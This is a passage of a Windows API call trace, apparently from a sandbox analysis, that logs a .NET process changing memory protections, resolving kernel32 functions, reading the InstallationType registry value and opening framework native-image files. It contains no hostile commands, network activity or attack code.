BaseAddress=0x41c9f8*=0x777117c8, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.448] GetCurrentProcess () returned 0xffffffff [0063.448] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x777117c8, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.448] GetCurrentProcess () returned 0xffffffff [0063.448] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x777117d0, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.448] GetCurrentProcess () returned 0xffffffff [0063.448] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x777117d0, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.448] GetCurrentProcess () returned 0xffffffff [0063.448] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x7771180c, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.449] GetCurrentProcess () returned 0xffffffff [0063.449] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x7771180c, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.449] GetCurrentProcess () returned 0xffffffff [0063.449] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x7771182c, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.449] GetCurrentProcess () returned 0xffffffff [0063.449] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x7771182c, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.450] GetCurrentProcess () returned 0xffffffff [0063.450] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x77711860, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.450] GetCurrentProcess () returned 0xffffffff [0063.450] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x77711860, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.451] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0063.458] SysReAllocStringLen (in: pbstr=0x41d324*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41d324*="kernel32") returned 1 [0063.458] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0063.458] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0063.462] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0063.463] SysReAllocStringLen (in: pbstr=0x41d324*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41d324*="kernel32") returned 1 [0063.463] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0063.463] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0063.466] GetProcAddress (hModule=0x76d30000, lpProcName="LocaleNameToLCID") returned 0x76dc4801 [0063.472] SysReAllocStringLen (in: pbstr=0x41d64c*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41d64c*="kernel32") returned 1 [0063.472] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0063.473] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0063.476] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0063.477] SysReAllocStringLen (in: pbstr=0x41d574*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41d574*="kernel32") returned 1 [0063.477] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0063.477] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0063.480] GetProcAddress (hModule=0x76d30000, lpProcName="LCIDToLocaleName") returned 0x76d6ced4 [0063.481] SysReAllocStringLen (in: pbstr=0x41d628*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41d628*="kernel32") returned 1 [0063.481] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0063.481] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0063.484] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserPreferredUILanguages") returned 0x76dc47d1 [0063.491] SysReAllocStringLen (in: pbstr=0x41db0c*=0x0, psz="nlssorting.dll", len=0xe | out: pbstr=0x41db0c*="nlssorting.dll") returned 1 [0063.491] CharLowerBuffW (in: lpsz="nlssorting.dll", cchLength=0xe | out: lpsz="nlssorting.dll") returned 0xe [0063.492] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll", hFile=0x0, dwFlags=0x8) returned 0x75350000 [0063.575] GetLastError () returned 0x0 [0063.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41daf4*=0x75360004, NumberOfBytesToProtect=0x41daf8, NewAccessProtection=0x4, OldAccessProtection=0x41db2c | out: BaseAddress=0x41daf4*=0x75360000, NumberOfBytesToProtect=0x41daf8, OldAccessProtection=0x41db2c*=0x2) returned 0x0 [0063.575] GetCurrentProcess () returned 0xffffffff [0063.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41daf4*=0x75360004, NumberOfBytesToProtect=0x41daf8, NewAccessProtection=0x2, OldAccessProtection=0x41db2c | out: BaseAddress=0x41daf4*=0x75360000, NumberOfBytesToProtect=0x41daf8, OldAccessProtection=0x41db2c*=0x4) returned 0x0 [0063.575] GetCurrentProcess () returned 0xffffffff [0063.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41daf4*=0x7536000c, NumberOfBytesToProtect=0x41daf8, NewAccessProtection=0x4, OldAccessProtection=0x41db2c | out: BaseAddress=0x41daf4*=0x75360000, NumberOfBytesToProtect=0x41daf8, OldAccessProtection=0x41db2c*=0x2) returned 0x0 [0063.576] GetCurrentProcess () returned 0xffffffff [0063.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41daf4*=0x7536000c, NumberOfBytesToProtect=0x41daf8, NewAccessProtection=0x2, OldAccessProtection=0x41db2c | out: BaseAddress=0x41daf4*=0x75360000, NumberOfBytesToProtect=0x41daf8, OldAccessProtection=0x41db2c*=0x4) returned 0x0 [0063.576] GetCurrentProcess () returned 0xffffffff [0063.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41daf4*=0x75360010, NumberOfBytesToProtect=0x41daf8, NewAccessProtection=0x4, OldAccessProtection=0x41db2c | out: BaseAddress=0x41daf4*=0x75360000, NumberOfBytesToProtect=0x41daf8, OldAccessProtection=0x41db2c*=0x2) returned 0x0 [0063.577] GetCurrentProcess () returned 0xffffffff [0063.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41daf4*=0x75360010, NumberOfBytesToProtect=0x41daf8, NewAccessProtection=0x2, OldAccessProtection=0x41db2c | out: BaseAddress=0x41daf4*=0x75360000, NumberOfBytesToProtect=0x41daf8, OldAccessProtection=0x41db2c*=0x4) returned 0x0 [0063.577] GetCurrentProcess () returned 0xffffffff [0063.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41daf4*=0x75360014, NumberOfBytesToProtect=0x41daf8, NewAccessProtection=0x4, OldAccessProtection=0x41db2c | out: BaseAddress=0x41daf4*=0x75360000, NumberOfBytesToProtect=0x41daf8, OldAccessProtection=0x41db2c*=0x2) returned 0x0 [0063.577] GetCurrentProcess () returned 0xffffffff [0063.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41daf4*=0x75360014, NumberOfBytesToProtect=0x41daf8, NewAccessProtection=0x2, OldAccessProtection=0x41db2c | out: BaseAddress=0x41daf4*=0x75360000, NumberOfBytesToProtect=0x41daf8, OldAccessProtection=0x41db2c*=0x4) returned 0x0 [0063.578] GetCurrentProcess () returned 0xffffffff [0063.578] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41daf4*=0x7536001c, NumberOfBytesToProtect=0x41daf8, NewAccessProtection=0x4, OldAccessProtection=0x41db2c | out: BaseAddress=0x41daf4*=0x75360000, NumberOfBytesToProtect=0x41daf8, OldAccessProtection=0x41db2c*=0x2) returned 0x0 [0063.578] GetCurrentProcess () returned 0xffffffff [0063.578] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41daf4*=0x7536001c, NumberOfBytesToProtect=0x41daf8, NewAccessProtection=0x2, OldAccessProtection=0x41db2c | out: BaseAddress=0x41daf4*=0x75360000, NumberOfBytesToProtect=0x41daf8, OldAccessProtection=0x41db2c*=0x4) returned 0x0 [0063.579] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x25c [0063.581] GetLastError () returned 0x0 [0063.581] SysReAllocStringLen (in: pbstr=0x41da90*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", len=0x3d | out: pbstr=0x41da90*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp") returned 1 [0063.581] GetThreadLocale () returned 0x409 [0063.581] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0063.581] GetThreadLocale () returned 0x409 [0063.581] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0063.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", nBufferLength=0x104, lpBuffer=0x41d814, lpFilePart=0x41d810 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", lpFilePart=0x41d810*="SortDefault.nlp") returned 0x3d [0063.582] SysReAllocStringLen (in: pbstr=0x41da90*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", len=0x3d | out: pbstr=0x41da90*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp") returned 1 [0063.582] SysReAllocStringLen (in: pbstr=0x41da40*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", len=0x3d | out: pbstr=0x41da40*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp") returned 1 [0063.582] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", cchLength=0x3d | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") returned 0x3d [0063.582] SysReAllocStringLen (in: pbstr=0x41da90*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp", len=0x3d | out: pbstr=0x41da90*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") returned 1 [0063.582] SetLastError (dwErrCode=0x0) [0063.582] CreateFileMappingA (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0063.582] GetCurrentThreadId () returned 0xba4 [0063.582] ResetEvent (hEvent=0xb8) returned 1 [0063.582] GetCurrentThreadId () returned 0xba4 [0063.582] GetCurrentThreadId () returned 0xba4 [0063.582] GetCurrentThreadId () returned 0xba4 [0063.582] GetCurrentThreadId () returned 0xba4 [0063.582] ResetEvent (hEvent=0xb8) returned 1 [0063.582] GetCurrentThreadId () returned 0xba4 [0063.582] GetCurrentThreadId () returned 0xba4 [0063.582] SetEvent (hEvent=0xbc) returned 1 [0063.583] SetEvent (hEvent=0xb8) returned 1 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] SetEvent (hEvent=0xbc) returned 1 [0063.583] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x5750000 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] ResetEvent (hEvent=0xb8) returned 1 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] ResetEvent (hEvent=0xb8) returned 1 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] GetCurrentThreadId () returned 0xba4 [0063.583] SetEvent (hEvent=0xbc) returned 1 [0063.583] SetEvent (hEvent=0xb8) returned 1 [0063.584] CloseHandle (hObject=0x260) returned 1 [0063.584] GetCurrentThreadId () returned 0xba4 [0063.584] ResetEvent (hEvent=0xb8) returned 1 [0063.584] GetCurrentThreadId () returned 0xba4 [0063.584] GetCurrentThreadId () returned 0xba4 [0063.584] GetCurrentThreadId () returned 0xba4 [0063.584] GetCurrentThreadId () returned 0xba4 [0063.584] ResetEvent (hEvent=0xb8) returned 1 [0063.584] GetCurrentThreadId () returned 0xba4 [0063.584] GetCurrentThreadId () returned 0xba4 [0063.584] SetEvent (hEvent=0xbc) returned 1 [0063.584] SetEvent (hEvent=0xb8) returned 1 [0063.584] CloseHandle (hObject=0x25c) returned 1 [0063.593] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyEx") returned 0x0 [0063.593] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0063.593] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x41deac | out: phkResult=0x41deac*=0x25c) returned 0x0 [0063.594] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueEx") returned 0x0 [0063.594] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0063.595] RegQueryValueExW (in: hKey=0x25c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x41decc, lpData=0x0, lpcbData=0x41dec8*=0x0 | out: lpType=0x41decc*=0x1, lpData=0x0, lpcbData=0x41dec8*=0xe) returned 0x0 [0063.595] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueEx") returned 0x0 [0063.596] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0063.596] RegQueryValueExW (in: hKey=0x25c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x41decc, lpData=0x3354f64, lpcbData=0x41dec8*=0xe | out: lpType=0x41decc*=0x1, lpData="Client", lpcbData=0x41dec8*=0xe) returned 0x0 [0063.597] RegCloseKey (hKey=0x25c) returned 0x0 [0063.612] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\766a572f745b54553bd34406293b4f78\\system.configuration.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0063.612] GetLastError () returned 0x0 [0063.612] SysReAllocStringLen (in: pbstr=0x41b630*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", len=0x84 | out: pbstr=0x41b630*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux") returned 1 [0063.612] GetThreadLocale () returned 0x409 [0063.612] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0063.612] GetThreadLocale () returned 0x409 [0063.612] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0063.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x41b3b4, lpFilePart=0x41b3b0 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", lpFilePart=0x41b3b0*="System.Configuration.ni.dll.aux") returned 0x84 [0063.612] SysReAllocStringLen (in: pbstr=0x41b630*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", len=0x84 | out: pbstr=0x41b630*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux") returned 1 [0063.612] SysReAllocStringLen (in: pbstr=0x41b5e0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", len=0x84 | out: pbstr=0x41b5e0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux") returned 1 [0063.612] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", cchLength=0x84 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\766a572f745b54553bd34406293b4f78\\system.configuration.ni.dll.aux") returned 0x84 [0063.612] SysReAllocStringLen (in: pbstr=0x41b630*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\766a572f745b54553bd34406293b4f78\\system.configuration.ni.dll.aux", len=0x84 | out: pbstr=0x41b630*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\766a572f745b54553bd34406293b4f78\\system.configuration.ni.dll.aux") returned 1 [0063.613] SetLastError (dwErrCode=0x0) [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] SetEvent (hEvent=0xbc) returned 1 [0063.613] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x360 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] GetCurrentThreadId () returned 0xba4 [0063.613] SetEvent (hEvent=0xbc) returned 1 [0063.613] ReadFile (in: hFile=0x260, lpBuffer=0x72cff0, nNumberOfBytesToRead=0x360, lpNumberOfBytesRead=0x41b6e4, lpOverlapped=0x0 | out: lpBuffer=0x72cff0*, lpNumberOfBytesRead=0x41b6e4*=0x360, lpOverlapped=0x0) returned 1 [0063.615] GetCurrentThreadId () returned 0xba4 [0063.615] ResetEvent (hEvent=0xb8) returned 1 [0063.615] GetCurrentThreadId () returned 0xba4 [0063.615] GetCurrentThreadId () returned 0xba4 [0063.615] GetCurrentThreadId () returned 0xba4 [0063.615] GetCurrentThreadId () returned 0xba4 [0063.615] ResetEvent (hEvent=0xb8) returned 1 [0063.615] GetCurrentThreadId () returned 0xba4 [0063.615] GetCurrentThreadId () returned 0xba4 [0063.616] SetEvent (hEvent=0xbc) returned 1 [0063.616] SetEvent (hEvent=0xb8) returned 1 [0063.616] CloseHandle (hObject=0x260) returned 1 [0063.638] SysReAllocStringLen (in: pbstr=0x41a4e0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41a4e0*="kernel32.dll") returned 1 [0063.638] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0063.638] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0063.641] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0063.642] GetCurrentThreadId () returned 0xba4 [0063.642] ResetEvent (hEvent=0xb8) returned 1 [0063.642] GetCurrentThreadId () returned 0xba4 [0063.642] GetCurrentThreadId () returned 0xba4 [0063.642] GetCurrentThreadId () returned 0xba4 [0063.642] GetCurrentThreadId () returned 0xba4 [0063.642] ResetEvent (hEvent=0xb8) returned 1 [0063.642] GetCurrentThreadId () returned 0xba4 [0063.642] GetCurrentThreadId () returned 0xba4 [0063.642] SetEvent (hEvent=0xbc) returned 1 [0063.642] SetEvent (hEvent=0xb8) returned 1 [0063.642] CloseHandle (hObject=0x260) returned 1 [0063.659] SysReAllocStringLen (in: pbstr=0x41a4f8*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41a4f8*="kernel32.dll") returned 1 [0063.659] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0063.659] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0063.662] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0063.663] GetCurrentThreadId () returned 0xba4 [0063.663] ResetEvent (hEvent=0xb8) returned 1 [0063.663] GetCurrentThreadId () returned 0xba4 [0063.663] GetCurrentThreadId () returned 0xba4 [0063.663] GetCurrentThreadId () returned 0xba4 [0063.663] GetCurrentThreadId () returned 0xba4 [0063.663] ResetEvent (hEvent=0xb8) returned 1 [0063.663] GetCurrentThreadId () returned 0xba4 [0063.663] GetCurrentThreadId () returned 0xba4 [0063.663] SetEvent (hEvent=0xbc) returned 1 [0063.663] SetEvent (hEvent=0xb8) returned 1 [0063.663] CloseHandle (hObject=0x260) returned 1 [0063.669] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\386fde9190d499d6645df8b90eb76242\\system.core.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0063.669] GetLastError () returned 0x0 [0063.669] SysReAllocStringLen (in: pbstr=0x41acf0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", len=0x72 | out: pbstr=0x41acf0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux") returned 1 [0063.669] GetThreadLocale () returned 0x409 [0063.669] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0063.669] GetThreadLocale () returned 0x409 [0063.669] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0063.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x41aa74, lpFilePart=0x41aa70 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", lpFilePart=0x41aa70*="System.Core.ni.dll.aux") returned 0x72 [0063.670] SysReAllocStringLen (in: pbstr=0x41acf0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", len=0x72 | out: pbstr=0x41acf0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux") returned 1 [0063.670] SysReAllocStringLen (in: pbstr=0x41aca0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", len=0x72 | out: pbstr=0x41aca0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux") returned 1 [0063.670] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", cchLength=0x72 | out: 